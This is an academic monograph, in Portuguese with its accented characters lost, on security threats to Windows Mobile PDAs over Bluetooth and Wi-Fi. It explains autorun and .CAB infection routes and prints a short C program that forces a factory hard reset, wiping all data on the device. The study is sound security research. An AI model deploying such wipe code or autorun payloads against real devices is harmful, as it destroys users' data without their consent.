Estudo Prtico de Ameaas de Segurana em Dispositivos portteis ...

Download Estudo Prtico de Ameaas de Segurana em Dispositivos portteis ...

Post on 09-Jan-2017

212 views

Category:

Documents

0 download

TRANSCRIPT

  • Um estudo prtico das ameas de segurana em dispositivos portteis com Windows Mobile

    Bruno Paulo Usiglio Kovacs e Vanesa de Freitas Monteiro Departamento de Informtica PUC-Rio Rua M. S. Vicente 225, 22453-900

    Rio de Janeiro RJ, Brazil {bruno.kovacs@gmail.com ; freitasmon@ig.com.br}

    Professor orientador: Markus Endler

    Resumo: esta monografia se prope a apresentar ameaas de segurana a dispositivos de computao mvel, dando foco principal queles que utilizam o sistema operacional Windows Mobile. As vias de contaminao abordadas sero os padres BlueTooth e Wi-fi (802.11). Experimentos prticos foram realizados, procurando reproduzir pesquisas de grupos especializados no assunto. Palavras-chave: PDA, PocketPC, handheld, Wi-Fi, Bluetooth, redes sem-fio, malware, trojan, worm, ameaa, segurana, Windows Mobile, porta dos fundos, WEP, WPA, criptografia, chave.

  • 2

    ndice 1. Introduo................................................................................................................................... 3 1.1. Objetivo e Definies ......................................................................................................... 4 1.1.1. Definio de um dispositivo mvel ................................................................................ 4 1.1.2. Ameaa de segurana................................................................................................... 4 1.1.3. Rede sem fio.................................................................................................................. 5 1.2. Introduo ao Windows Mobile.......................................................................................... 5 1.3. Introduo ao IEEE 802.11................................................................................................ 6 1.3.1. Funcionamento .............................................................................................................. 8 1.3.2. Origem e significado do termo 'Wi-Fi'............................................................................ 9 1.4. Introduo ao WEP............................................................................................................ 9 1.5. Introduo ao WPA.......................................................................................................... 10 1.6. Introduo ao Bluetooth................................................................................................... 11

    2. Ataque Locais ........................................................................................................................... 13 2.1.1. Obstculos encontrados para se atacar um PDA ....................................................... 13 2.1.2. Arquivos .CAB ............................................................................................................. 14 2.1.3. Execuo automtica de aplicaes (auto-run) .......................................................... 14 2.1.4. Restaurao das configuraes de fbrica ................................................................. 15 2.1.5. Internet Explorer para PDAs........................................................................................ 16 2.1.6. Viso reduzida de URLs.............................................................................................. 16 2.1.7. Modelo de Objeto de Domnio do PIE (PIE Domain Object Model)............................ 17 2.1.8. Acesso a arquivos locais usando o Pocket IE............................................................. 17 2.1.9. Monitorao de teclas digitadas .................................................................................. 18 2.1.10. Anlise forense............................................................................................................ 19 2.1.11. Engenharia reversa de binrios................................................................................... 19 2.1.12. Servidor de FTP oculto................................................................................................ 21 2.1.13. Controle remoto ........................................................................................................... 22 2.2. Descrio de ameaas especficas ................................................................................. 23

    3. Ataques atravs da Rede ......................................................................................................... 23 3.1. Classificao geral de tipos de ataques .......................................................................... 23 3.1.1. Formas de ataques genricas ..................................................................................... 23 3.1.2. Quebra de chave da criptografia ................................................................................. 24 3.1.3. Tomada de controle do dispositivo.............................................................................. 24 3.1.4. Pontos de acesso falsos.............................................................................................. 24 3.1.5. Viso geral de worms/virus conhecidos ...................................................................... 25 3.2. Ataques via interface Bluetooth ....................................................................................... 26 3.2.1. Varrendo endereos Bluetooth.................................................................................... 26 3.2.2. Reduzindo a margem de endereos possveis ........................................................... 27 3.2.3. Descobrindo endereos Bluetooth enquanto se comunicam...................................... 27 3.2.4. Comunicao via Bluetooth entre dispositivos & segurana....................................... 28 3.2.5. Problemas relacionados a fabricantes ........................................................................ 29 3.2.6. O Risco de conexo APs falsos ............................................................................... 30 3.2.7. Ataques especficos..................................................................................................... 32 3.3. Ataques via interface IEEE 802.11 .................................................................................. 34 3.3.1. Ataques ao WEP ......................................................................................................... 34 3.3.2. Ataques ao WPA ......................................................................................................... 35 3.3.3. Ataques de invaso de memria (Buffler Overflow attacks) ....................................... 35 3.3.4. Captura de trfego....................................................................................................... 36 3.3.5. Anlise de vulnerabilidades......................................................................................... 37 3.3.6. Abrindo portas para um ataque ................................................................................... 37

    4. Checklist de Segurana para dispositivos mveis em redes sem-fio ...................................... 38 5. Avaliao Prtica ...................................................................................................................... 40 5.1. Testes com Emuladores vs Teste com dispositivos fsicos............................................. 40 5.1.1. Descrio do ambiente de testes com emuladores .................................................... 40

  • 3

    5.1.2. Descrio do ambiente de testes com dispositivos fsicos ......................................... 41 5.1.3. Vantagens e desvantagens quanto aos ambientes .................................................... 42 5.2. Discusso sobre metodologia e critrios de avaliao.................................................... 42 5.3. Testes com emuladores................................................................................................... 43 5.4. Testes locais .................................................................................................................... 45 5.5. Testes com Bluetooth ...................................................................................................... 48 5.6. Testes com IEEE 802.11 ................................................................................................. 50

    6. Concluso................................................................................................................................. 53 7. Referncias Bibliogrficas ........................................................................................................ 55

    ndice de figuras Figura 1: IEEE 802.11 e o modelo OSI/ISO........................................................................................ 7 Figura 2: Opo de ser descoberto ou no....................................................................................... 12 Figura 3: Cdigo para retornar configurao de fbrica do dispositivo (Hard reset) ..................... 15 Figura 4: Cdigo em HTML que ir finalizar imediatamente o Pocket Internet Explorer.................. 16 Figura 5: barra de endereos reduzida pode enganar usurios ....................................................... 17 Figura 6: servidor de FTP identifica-se atravs de cone na rea de trabalho ................................. 21 Figura 7: Janela exibida ao iniciar a aplicao VirtualCE ................................................................. 22 Figura 8: Exemplo de configurao da autenticao de uma configurao Bluetooth..................... 29 Figura 9: A descoberta de dispositivos no divulga seu endereo Bluetooth .................................. 31 Figura 10: vxSniffer em ao ............................................................................................................ 36 Figura 11: Emulao do Windows Mobile 2003 SE em PocketPC................................................... 41 Figura 12: Emulao do Windows Mobile 2003 SE em SmartPhone............................................... 41 Figura 13: VxSniffer coletou trfego da interface local ..................................................................... 44 Figura 14: Detalhes de uma requisio do protocolo ARP ............................................................... 44 Figura 15: Acesso via FTP atravs da Internet ao PocketPC e exibio dos arquivos locais. ........ 46 Figura 16: Autenticao com senha para acesso remoto (Atravs da aplicao VirtualCE) ........... 46 Figura 17: Controle remoto do PocketPC via Internet ...................................................................... 46 Figura 18: Controle remoto do PocketPC via Internet ...................................................................... 47 Figura 19: Controle remoto do PocketPC via Internet ...................................................................... 47 Figura 20: Editando o registro do Windows Mobile atravs da aplicao Mobile Registry Editor . 48 Figura 21: Habilitando a interface Bluetooth do dispositivo .............................................................. 49 Figura 22: Configurando a interface Bluetooth do dispositivo para estar visvel .............................. 49 Figura 23: Aplicao btCrawler com funo de bluesnarfing habilitada via edio de registro........ 49 Figura 24: Mini-stumbler no reconheceu a interface de rede sem fio............................................. 50 Figura 25: Captura de trfego da rede 802.11 do LAC..................................................................... 51 Figura 26: Detalhes do segmento TCP capturado............................................................................ 51 Figura 27: Anlise do contedo capturado. Pode-se visualizar o contedo das requisies........... 52 Figura 28: Exibio dos pacotes capturados. ................................................................................... 52 Figura 29: Ferramenta E-eye WiFi Scanner identificou uma rede 802.11 com WEP habilitado ...... 53

  • 4

    1. Introduo

    Um PDA (Personal Digital Assistant), ou Assistente Pessoal Digital, um computador de

    dimenses reduzidas, dotado de grande capacidade computacional, normalmente cumprindo as

    funes de agenda, sistema de escritrio, oferecendo recursos multimdia e entretenimento, com

    possibilidade de interconexo com um computador pessoal e uma rede sem-fio para acesso a

    correio eletrnico e internet.

    Infelizmente, este simples dispositivo pode gerar um furo de segurana na estrutura de

    muitas corporaes, que pode ser explorado por pessoas com fins no amigveis. Atualmente, a

    maioria das empresas nem mesmo cita a verificao de dispositivos mveis em suas polticas de

    segurana ou em sistemas de controle, ou ainda, no possuem idia de como estes so utilizados

    na sua prpria rede ou em localidades remotas. No apenas o dispositivo mvel em si pode ser

    comprometido, tendo suas informaes capturadas, mas pode ser contaminado por um cavalo de

    tria e transformado em um livre ponto de acesso rede corporativa.

    Este documento analisa algumas das formas de se atacar um dispositivo mvel e quais as

    conseqncias que podero ser geradas.

    1.1. Objetivo e Definies

    O objetivo principal deste trabalho apresentar ameaas de segurana que podem afetar

    dispositivos de computao mvel, considerando o escopo dos sistemas operacionais de mercado

    Windows Mobile 2003/5.0 e as tecnologias de rede sem-fio Bluetooth e 802.11. Estas tecnologias

    sero apresentadas de forma introdutria, de modo a contextualizar as ameaas estudadas.

    Alm da teoria apresentada, experincias prticas so conduzidas, apresentando um

    relatrio tcnico com resultados obtidos no final do trabalho.

    1.1.1. Definio de um dispositivo mvel

    Vamos considerar que um dispositivo mvel um equipamento digital que serve para

    realizar tarefas dirias de trabalho. Isso inclui todos os Pocket PCs, Palms, SmartPhones e

    relacionados. Alm destes, outros dispositivos mveis que utilizam a plataforma Windows

    CE.NET. Apesar de laptops se enquadrarem neste perfil, estes no tero foco deste trabalho.

    1.1.2. Ameaa de segurana

    So consideradas ameaas de segurana, aquelas que possam comprometer a

    confidencialidade, integridade e disponibilidade de dados e servios utilizados pelos usurios da

  • 5

    infra-estrutura de computao mvel. A seguir, definimos cada um dos trs pilares da segurana

    de informao:

    Confidencialidade - propriedade que limita o acesso informao to somente s entidades

    legtimas, ou seja, quelas autorizadas pelo proprietrio da informao.

    Integridade - propriedade que garante que a informao manipulada mantenha todas as

    caractersticas originais estabelecidas pelo proprietrio da informao, incluindo controle de

    mudanas e garantia do seu ciclo de vida (nascimento, manuteno e destruio).

    Disponibilidade - propriedade que garante que a informao esteja sempre disponvei para o uso

    legtimo, ou seja, por aqueles usurios autorizados pelo proprietrio da informao.

    1.1.3. Rede sem fio

    Rede sem fio um termo utilizado para designar a interconexo de computadores em um

    sistema sem o uso de fios, por meio de dispositivos apropriados. Atualmente, as ondas de rdio

    so o meio mais eficaz para possibilitar estas ligaes. So exemplos de tecnologias de rede sem

    fio abordadas neste artigo o BlueTooth e o 802.11, vulgo Wi-fi.

    1.2. Introduo ao Windows Mobile

    Viso Geral

    O Microsoft Windows Mobile uma plataforma de sistema operacional de 32 bits,

    multitarefa e multisegmentado. Tem uma estrutura de arquitetura aberta que d suporte a

    uma variedade de dispositivos de comunicao, entretenimento e computao mvel. um

    sistema operacional inteiramente novo, compacto, porttil e proporciona uma interface

    intuitiva e de fcil aprendizado, incorporada de elementos familiares do Windows para PCs.

    compatvel com os melhores e mais teis hardwares do mercado tais como: modem cards, Flash

    cards, Color Digital Camera Card, cabos de sada VGA e porta Paralela, entre outros.

    Diferentes Verses

    O Windows Mobile, lanado em Junho de 2003, est disponvel em diferentes classes de

    equipamentos:

  • 6

    Windows Mobile Pocket PC

    Permite controlar os contatos, agenda, tarefas a fazer, anotaes, tocar msicas, vdeos,

    jogar, receber e enviar e-mails, e mensagem instantnea, dentre outras funes. Essa a verso

    do Widows Mobile para os computadores mveis.

    Windows Mobile Pocket PC Phone

    O sistema combina os recursos padres do Windows Mobile para Pocket PC com os

    recursos para telefonia, integrados ao PDA. possvel, por exemplo, discar para uma pessoa em

    sua lista de contatos, enviar mensagens SMS, navegar pela Internet, etc. Pode-se considerar esse

    sistema o Pocket PC com recursos de celular, onde o principal continua sendo o PDA;

    Windows Mobile Smartphone

    Neste caso o foco diferente. O Windows Mobile para Smartphones integra recursos de

    PDA em um equipamento criado para ligaes de voz, e do tamanho dos atuais aparelhos

    celulares. O sistema desenvolvido para operao com uma mo, e otimizado para comunicao

    de voz e dados, permitindo o acesso sem fio ao Outlook, navegao segura na Internet e rede

    corporativa. Em funo das diferenas em relao s outras verses do Windows Mobile, os

    programas para smartphone so especficos, e no geral incompatveis com as outras verses do

    sistema.

    1.3. Introduo ao IEEE 802.11

    Uma rede sem fio do padro 802.11 (wireless LAN - WLAN ou WiFi) um sistema de

    transmisso de dados desenvolvido para oferecer acesso rede independentemente de

    localizao, atravs de ondas de rdio ao invs de uma infra-estrutura cabeada.

    A aceitao em larga escala desta tecnologia depende da criao de um padro de

    mercado para garantir a compatibilidade e confiabilidade de produtos de diversos fabriacantes.

    A especificao 802.11 [Padro IEEE 802.11 (ISO/IEC 8802-11: 1999)] como um padro

    para redes sem fio foi formalmente aprovada pelo Instituo de Engenheiros de Eltrica e

    Eletrnica (Institute of Electrical and Electronics Engineers - IEEE) no ano de 1997. Esta verso do

    802.11 oferece velocidades de transmisso de dados de 1 e 2 Mbps e um conjunto de mtodos de

    sinalizao e outros servios. Como todos os padres do IEEE, o 802.11 tem foco nas duas

    camadas inferiores do modelo OSI/ISO: camadas fsica e de enlace. Qualquer aplicao de rede,

    sistema operacional de rede, protocolo, incluindo o TCP/IP e o Novell Netware, iro funcionar em

  • 7

    redes sem fio em conformidade com este padro da mesma forma que funcionam nas redes

    Ethernet.

    Figura 1: IEEE 802.11 e o modelo OSI/ISO

    A grande motivao e benefcio quanto s redes sem fio o aumento de mobilidade. O

    fato da estao no estar confinada a um ponto de rede cabeado, permite ao usurio que se

    locomova livremente por praticamente qualquer lugar, conectado rede.

    Outra vantagem o custo-benefcio da implantao de uma rede que exija conectividade

    em localidades de difcil acesso para realizar cabeamento, como no caso de prdios antigos e

    paredes rgidas. Alm disso, a reduo de custo total de propriedade, especialmente em lugares

    de mudanas constantes, devido ao mnimo de cabeamento realizado e baixo custo de instao

    de equipamentos e pontos de acesso para usurios.

    Redes sem fio permitem usurios acessar recursos da rede sem que dependam de pontos

    de rede em lugares especficos, dando assim as seguintes vantagens:

    Acesso imediato a informaes de pacientes mdicos, ao lado dos mesmos, o que til

    para mdicos e para equipes mdicas.

    Acesso rpido para consultores externos ou auditores, que estejam em servio ao longo

    da extenso da empresa.

  • 8

    Facilita o controle de supervisores como gerentes de linhas de montagem, auditors de

    depsitos ou engenheiros de construo, pois por exemplo oferece acesso a bancos de

    dados de qualquer lugar.

    Configurao de rede simplificada, exigindo menor dependncia do envolvimento de

    times de suporte em eventos expordicos, como palestras.

    Acesso mais rpido a informaes de clients para vendedores e varejistas, resultando em

    uma melhor qualidade de servio e consequente satisfao do cliente.

    Permite administradores de rede acessarem recursos a partir de qualquer lugar dentro da

    empresa, permitindo-os resolver problemas com mais velocidade.

    O padro 802.11 possui 6 verses de modulao pelo ar, todas usando o mesmo protocolo. As

    mais populares so as verses a , b e g. Estas, foram desenvolvidas levando em considerao

    problemas de segurana, mas a verso que teve este assunto levado mais srio foi a verso i.

    Outras verses do padro (cf, h, j) so melhoramentos e extenses de verses anteriores. O

    802.11b foi o primeiro padro largamente aceito, seguido pelas verses 802.11a e 802.11g.

    Os padres 802.11b e 802.11g usam a faixa de freqncia de 2.4 gigahertz (GHz) e devido

    a este fato, podem sofrer interferncias com fornos de micro-onda, telefones sem-fio,

    dispositivos Bluetooth e outros equipamentos que fazem uso da mesma faixa. O 802.11a usa a

    faixa de 5 GHz, e por isso no afetado por produtos que operem na faixa de 2.4Ghz.

    A faixa de freqncia do spectro utilizada pode ser utilizada em vrios pases, sendo que

    as limitaes mais acirradas ocorrem nos Estados Unidos.

    1.3.1. Funcionamento

    Uma tpica rede Wi-Fi contem um ou mais pontos de acesso (Access Points - APs) e um ou

    mais clientes. Um AP transmite para todos que podem escutar (broadcast) o seu SSID (Service Set

    Identifier, nome da rede) atravs de pacotes chamados beacons, o que acontece normalmente a

    cada 100 ms. Os beacons so transmitidos na velocida de 1 Mbit/s, so pacotes que tem pouca

    durao e por isso no impactam significativamente em performance. Como a velocidade mnima

    aceitvel para se conectar rede de 1Mbit/s, assume-se que a taxa de transmisso dos beacons

    suficiente para atender at o cliente em piores situaes.

    Baseado no SSID, o cliente pode escolher qual rede se conectar. Caso mais de um AP

    pertena mesma rede, o firmware do cliente pode escolher automaticamente o AP mais

    prximo. Como a transmisso feita atravs do ar neste tipo de rede, as mesmas propriedades

    de uma rede em barra so compartilhadas, por exemplo, at colises podem aparecer. No

    entanto, as redes Wi-Fi no so capazes de realizar deteco de coliso, e por isso usam um

    mtodo para evitar colises.

  • 9

    1.3.2. Origem e significado do termo 'Wi-Fi'

    Apesar da similaridade entre os termos 'Wi-Fi' e 'Hi-Fi', declaraes feitas por Phil

    Belanger, membro do grupo Wi-Fi Alliance contradizem a crena popular de que 'Wi-Fi' significa

    'Wireless Fidelity.'

    De acordo com Belanger, a empresa Interbrand desenvolveu a marca 'Wi-Fi' para o grupo

    Wi-Fi Alliance para ser usada para descrever produtos de rede sem fio baseados no padro IEEE

    802.11. Segundo Belanger, o termo 'Wi-Fi' e seu logotipo similar a um yin yang foram criados pela

    Interbrand, contratada pelo grupo para identificar produtos compatveis e fazer uma campanha

    de marketing.

    1.4. Introduo ao WEP

    O primeiro protocolo de segurana adotado, que conferia no nvel do enlace uma certa

    segurana para as redes sem fio foi o WEP (Wired Equivalent Privacy).

    Este protocolo, usado ainda hoje, utiliza o algoritmo RC4 para criptografar pacotes que

    so trocados numa rede sem fio a fim de tentar garantir confidenciabilidade aos dados de cada

    usurio. Alm disso, utiliza-se tambm a CRC-32, uma funo de deteco de erros que ao fazer o

    "checksum" de uma mensagem enviada gera um ICV (Integrity Check Value) que deve ser

    conferido pelo receptor da mensagem no intuito de verificar se a mensagem recebida foi

    corrompida e/ou alterada no meio do caminho.

    Vulnerabilidades do WEP

    No entanto, aps vrios estudos e testes realizados com este protocolo, foram achadas

    algumas vulnerabilidades e falhas que fizeram com que o WEP perdesse quase toda a sua

    credibilidade.

    No WEP, os dois parmetros que servem de entrada para o algoritmo RC4 so a chave

    secreta k de 40 bits ou 104 bits e um vetor de inicializao de 24 bits. A partir desses dois

    parmetros, o algoritmo gera uma seqncia criptografada RC4 (k,v).

    Porm, como no WEP a chave secreta k a mesma utilizada por todos os usurios de uma

    mesma rede, devemos ter um vetor de inicializao diferente para cada pacote a fim de evitar a

    repetio de uma mesma seqncia RC4. Essa repetio de seqncia extremamente

    indesejvel, pois d margem a ataques bem sucedidos e conseqente descoberta de pacotes por

    eventuais intrusos.

    Alm disso, h tambm uma forte recomendao para que seja feita a troca das chaves

    secretas periodicamente aumentando-se com isso a segurana da rede. Porm, essa troca quando

  • 10

    feita, realizada manualmente de maneira pouco prtica e por vezes invivel, quando se trata

    de redes com um nmero muito alto de usurios.

    Ainda, uma falha do WEP constatada e provada atravs de ataques bem sucedidos a

    natureza de sua funo detectora de erros. A CRC-32 uma funo linear e que no possui chave.

    Essas duas caractersticas tornam o protocolo suscetvel a dois tipos de ataques prejudiciais e

    indesejveis: possvel fazer uma modificao de mensagens que eventualmente tenham sido

    capturadas no meio do caminho sem que isso seja descoberto pelo receptor final devido a

    linearidade da funo detectora de erros, e alm disso, pelo fato da funo no possuir uma

    chave, tambm possvel descobrir uma seqncia secreta RC4 e de posse desta, ser autenticado

    na rede e introduzir mensagens clandestinas nesta.

    1.5. Introduo ao WPA

    Tambm chamado de WEP2, ou TKIP (Temporal Key Integrity Protocol), a primeira verso

    do WPA (Wi-Fi Protected Access) surgiu de um esforo conjunto de membros da Wi-Fi Aliana e

    de membros do IEEE, empenhados em aumentar o nvel de segurana das redes sem fio ainda no

    ano de 2003, combatendo algumas das vulnerabilidades do WEP.

    A partir desse esforo, pretendia-se colocar no mercado produtos que utilizassem WPA,

    pois algumas caractersticas fazem dele uma tima opo de segurana:

    Pode-se utilizar WPA numa rede hbrida que tenha WEP instalado.

    Migrar para WPA requer somente atualizao de software.

    WPA desenhado para ser compatvel com o prximo padro IEEE 802.11i.

    Vantagens do WPA sobre o WEP

    A substituio do WEP pelo WPA trouxe como vantagem uma melhora da criptografia dos

    dados ao utilizar um protocolo de chave temporria (TKIP) que possibilita a criao de chaves por

    pacotes, alm de possuir funo detectora de erros chamada Michael, um vetor de inicializao

    de 48 bits (ao invs de 24 como no WEP) e um mecanismo de distribuio de chaves.

    Alm disso, uma outra vantagem a melhoria no processo de autenticao de usurios.

    Essa autenticao utiliza o 802.1x e o EAP (Extensible Authentication Protocol), que atravs de

    um servidor de autenticao central faz a autenticao de cada usurio antes deste ter acesso a

    rede.

    O WPA, que est em fase de substituio do WEP, conta com tecnologia aprimorada de

    criptografia e de autenticao de usurio. Cada usurio tem uma senha exclusiva, que deve ser

    digitada no momento da ativao do WPA. No decorrer da sesso, a chave de criptografia ser

  • 11

    trocada periodicamente e de forma automtica. Assim, torna-se infinitamente mais difcil que um

    usurio no-autorizado consiga se conectar rede sem fio.

    A chave de criptografia dinmica uma das principais diferenas do WPA em relao ao

    WEP, que utiliza a mesma chave repetidamente. Esta caracterstica do WPA tambm

    conveniente porque no exige que se digite manualmente as chaves de criptografia - ao contrrio

    do WEP.

    1.6. Introduo ao Bluetooth

    A tecnologia de rede sem fio Bluetooth oferece uma maneira simples para realizar a

    comunicaes de diversos dispositivos mveis entre si, e tambm o acesso destes Internet sem

    a necessidade de cabos.

    O Bluetooth foi construdo para facilitar a transmisso de informao dentro de uma faixa

    relativamente pequena (em torno de dez metros). Trabalha de forma a reduzir o risco de

    interferncias entre dispositivos Bluetooth. Mudando a freqncia 1600 vezes em um segundo,

    muito improvvel que dois dispositivos, numa mesma rea, tero conflito entre si.

    O que torna o Bluetooth realmente atraente que ele automaticamente controla o

    processo de comunicao entre dispositivos. Varrendo a rea em volta por outros dispositivos

    Bluetooth e, estabelecendo uma conexo entre os descobertos, criado um tipo de mensagem

    informando a existncia da rede Bluetooth, denominada piconet, que se propaga entre os

    dispositivos criando uma rede de comunicao.

    O Bluetooth suportado e utilizado em produtos de mais de 3000 empresas, tais como

    Sony Ericsson [10], Nokia [27], Motorola [11], Intel [13], IBM [14], Toshiba [15], Apple [21],

    Microsoft [16] e at mesmo a Toyota [17], Lexus [19] e BMW [18]. Uma variedade de produtos

    disponveis no mercado possuem rdios Bluetooth integrados, como por exemplo impressoras,

    computadores portteis, teclados, carros e os mais populares, telefones celulares, tomando 60%

    do mercado de dispositivos Bluetooth. Esta tecnologia j ganhou muita popularidade, com mais

    de 3 milhes de produtos sendo vendidos toda semana. De acordo com o IDC [28], haver mais de

    922 milhes de dispositivos com Bluetooth em todo o mundo at 2008. A tecnologia pode ser

    bastante interessante e til, mas tambm pode ser uma grande ameaa privacidade de seus

    usurios.

    A tecnologia foi padronizada por um grupo chamado "Blueetooth Special Interest Group

    (SIG)". As empresas fundadoras do grupo so a Ericsson [20], IBM [14], Intel [13], Nokia [27] e

    Toshiba [15], e depois, passaram a fazer parte 3Com [24], Lucent Technologies [25], Microsoft

    Corporation [16] e Motorola Inc [11].

    A tecnologia ganhou sua verso atual, que trabalha com uma faixa de freqncia

    disponvel globalmente de 2.4 GHz, que permite que dois dispositivos mveis, em um raio de

  • 12

    distncia de 10-100 metros, transfiram/recebam dados com velocidade de 723.2Kbps ou 2.1Mbps

    utilizando uma nova especificao de transferncia de dados licenciada em 2005 (Enhanced Data

    Rate specification). Cada dispositivo pode simultaneamente se comunicar com at sete outros

    dispositivos.

    O Bluetooth foi feito pensando-se em segurana, oferecendo servios como autenticao,

    criptografia, qualidade de servio e outros recursos de segurana. No entanto, a tecnologia ainda

    est vulnervel em vrios aspectos, abrindo portas para ataques.

    Os usos mais comuns do Bluetooth atualmente so:

    Fone de ouvido para celular sem fio

    Sincronizar informaes como calendrios, agenda telefnica, entre um PDA e um PC

    Conectar uma impressora, teclado, ou mouse a um PC sem uso de fios

    Realizar transferncia de fotos ou msicas entre telefones celulares

    A tecnologia est em constante evoluo, visando aumentar seu grau de segurana,

    funcionalidade e facilidade de uso.

    Recursos de segurana da tecnologia Bluetooth

    O recurso mais comum e mais conhecido de um dispositivo Bluetooth a possibilidade de

    mant-lo invisvel ou no, perante outros ao seu redor, como mostrado a seguir:

    Figura 2: Opo de ser descoberto ou no

  • 13

    Quando um dispositivo est visvel, este pode ser facilmente encontrado utilizando

    scanners (programas de varredura da rede sem fio em busca de dispositivos). Alguns scanners

    tambm tm a funo de sniffer, ou seja, podem fazer a coleta de trfego de forma passiva.

    Configurar o dispositivo como invisvel, impede que scanners o encontrem, mas no

    impede que dispositivos que tenham conhecimento do endereo fsico de sua interface de rede

    (MAC) realizem comunicao com este, por exemplo, quando os dispositivos j estavam se

    comunicando previamente.

    2. Ataque Locais

    Ataques locais so aqueles que se faz necessrio a manipulao direta do dispositivo

    mvel, ou seja, deve-se t-lo nas prprias mos para executar a operao desejada. Nesta

    seo, sero apresentadas diversas tcnicas de ataque realizadas nesta modalidade, objetivando

    principalmente o roubo de informaes, infeco do dispositivo para posterior entrada atravs de

    redes sem fio e mostrar o quanto se torna vulnervel o dispositivo quando em mos erradas.

    2.1.1. Obstculos encontrados para se atacar um PDA

    Um dos obstculos que um atacante dever atravessar o fato de que a maioria dos

    sistemas operacionais de dispositivos mveis esto armazenados em memria somente para

    leitura (ROM). Este um grande desafio, pois realizar a depurao de aplicaes que so

    executadas diretamente na ROM nem sempre possvel. Como resultado, o atacante dever

    direcionar o seu ataque para uma aplicao terceira, que tenha sido instalada manualmente pelo

    dono do sistema. Assim, deve-se buscar uma falha nesta aplicao atravs de uma tcnica

    conhecida como teste cego (blind testing ou blackbox testing), pois no se tem acesso ao

    cdigo desta, mas pode-se tentar atac-la por fora, por exemplo, atravs de campos de

    entrada de variveis.

    Em segundo lugar, pode-se dizer que cada PDA nico. Isso significa que se a Dell [22] e

    a HP [23] oferecem modelos portando Windows Mobile, no significa que estes usam a mesma

    verso do sistema. Cada empresa instala junto com os mdulos essenciais do sistema,

    componentes particulares, o que pode dificultar bastante o desenvolvimento de cdigo malicioso

    para tais equipamentos. Como se j no fosse suficiente, atualizaes da ROM podem impactar

    drasticamente no sistema de arquivos utilizado e como os mdulos de sistema mais bsicos so

    carregados. Como resultado, existem grandes diferenas entre dois PDAs com relao ao

    endereamento de memria.

  • 14

    Em terceiro, as tcnicas de ataque a dispositivos mveis so relativamente novas. Um

    atacante deve ter dedicao e grande conhecimento tanto do processador quanto do sistema

    operacional do alvo. O ponto em que queremos chegar : atacar um PDA no to fcil quanto

    atacar um PC.

    Uma vez aceitas as limitaes, iremos apresentar os vetores e mtodos usados para

    deixar um PDA pronto para ser atacado.

    2.1.2. Arquivos .CAB

    Arquivos .CAB (cabinet files) so usados pela Microsoft [16] h muitos anos para agrupar

    diversos arquivos em um nico, que sero usados durante a instalao de alguma aplicao. Desta

    forma, no nenhuma surpresa que o mesmo formato de arquivo.CAB usado pelo Windows

    Mobile para instalar programas que foram tanto transferidos diretamente para o PDA pela rede,

    quanto transferidos atravs de uma conexo do ActiveSync*. O problema no est no fato do PDA

    usar estes arquivos, mas sim em como estes so processados e sequencialmente excludos.

    Prximo criao dos arquivos .CAB, foi descoberto que tais arquivos se auto-excluam

    aps terem sido executados. Enquanto este comportamento provavelmente uma tentativa de

    ajudar usurios a manterem a memria de seus dispositivos limpa, ironicamente se parece muito

    com o de cavalos de tria encontrados em PCs. O comportamento em si observado no aparenta

    um risco de segurana significativo, porm uma boa forma de ser ocultar a instalao de portas

    de entrada em PDAs. Como a execuo de .CABs pode criar arquivos e entradas no registro do

    sistema, alm de substituir ou excluir outros existentes, um usurio pode ser facilmente induzido

    a instalar cdigo malicioso escondido em um pacote aparentemente inofensivo. Por exemplo,

    como saber se o jogo que foi transferido de um site na Internet no contm surpresas

    indesejveis? A boa notcia que o Windows Mobile no exclui automaticamente os arquivos

    .CAB. Esta medida no ir proteger o sistema contra infeco, mas ir possibilitar a inspeo do

    contedo dos arquivos instalados.

    2.1.3. Execuo automtica de aplicaes (auto-run)

    Outra grande ameaa a execuo automtica de aplicaes. A simples insero de

    cartes de memria pode levar execuo de cdigo malicioso. Como o Windows Mobile foi

    desenvolvido pela Microsoft, a presena de um arquivo chamado autorun.exe em uma pasta

    chamada 2577 (considerando que o dispositivo trabalha com processador ARM) ser copiado

    para a pasta local do Windows e executado. Se o arquivo for algum tipo de cdigo malicioso, ser

    executado sem a interveno do usurio. Para ilustrar o estrago potencial, imagine que o cavalo

    de tria brador.exe (detalhado mais adiante), fosse renomeado para autorun.exe e inserido

    nesta pasta, dentro de um carto de memria dedicado a jogos de Atari. O carto provavelmente

  • 15

    seria compartilhado entre muitas pessoas dentro de uma empresa e infectaria cada PDA sem o

    consentimento de seus donos. O estrago causado na verdade vai de acordo com a vontade do

    desenvolvedor do cavalo de tria, que pode variar desde a instalao de um servidor FTP oculto

    at a execuo de um mecanismo do dispositivo que apaga todos os dados, voltando sua

    configurao original (hard reset).

    2.1.4. Restaurao das configuraes de fbrica

    Os PDAs em geral armazenam seus dados em memria interna dos tipos RAM e ROM. Os

    componentes bsicos do sistema operacional so gravados em memria Flash, enquanto os

    arquivos e programas adicionais em memria RAM. Os modelos mais recentes comearam a incluir

    maior quantidade de memria ROM, mas mesmo assim no onde a maioria dos documentos,

    calendrios e listas de afazeres so armazenados.

    O efeito colateral resultante desta arquitetura o fato de que o equipamento precisa de

    uma fonte constante de energia, caso contrrio, ir perder as informaes gravadas na RAM. A

    maioria das pessoas est ciente das conseqncias de se deixar a bateria descarregar

    completamente, mas o que as pessoas no tem conhecimento que a limpa total dos dados pode

    ser facilmente causada com a execuo de apenas algumas linhas de cdigo, apresentadas a

    seguir. Caso acontea destas linhas de cdigo serem executadas acidentalmente atravs da

    insero de um carto de memria ou atravs de um executvel transferido pela Internet, o PDA

    voltar ao estado em que foi tirado de sua caixa.

    #include #include #define IOCTL_HAL_REBOOT CTL_CODE(FILE_DEVICE_HAL, 15, METHOD_BUFFERED, FILE_ANY_ACCESS) extern "C" __declspec(dllimport)void SetCleanRebootFlag(void); extern "C" __declspec(dllimport) BOOL KernelIoControl( DWORD dwIoControlCode, LPVOID lpInBuf, DWORD nInBufSize, LPVOID lpOutBuf, DWORD nOutBufSize, LPDWORD lpBytesReturned); int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) { SetCleanRebootFlag(); KernelIoControl(IOCTL_HAL_REBOOT, NULL, 0, NULL, 0, NULL); return 0; }

    Figura 3: Cdigo para retornar configurao de fbrica do dispositivo (Hard reset)

    O problema em si no a existncia deste cdigo, mas sim o fato de que o comando

    KernelIoControl pode ser chamado por qualquer aplicao executando no sistema. Em outras

  • 16

    palavras, a falta de segurana no nvel do ncleo do sistema operacional (Kernel), pode

    transformar um comando til em um potencial ataque.

    2.1.5. Internet Explorer para PDAs

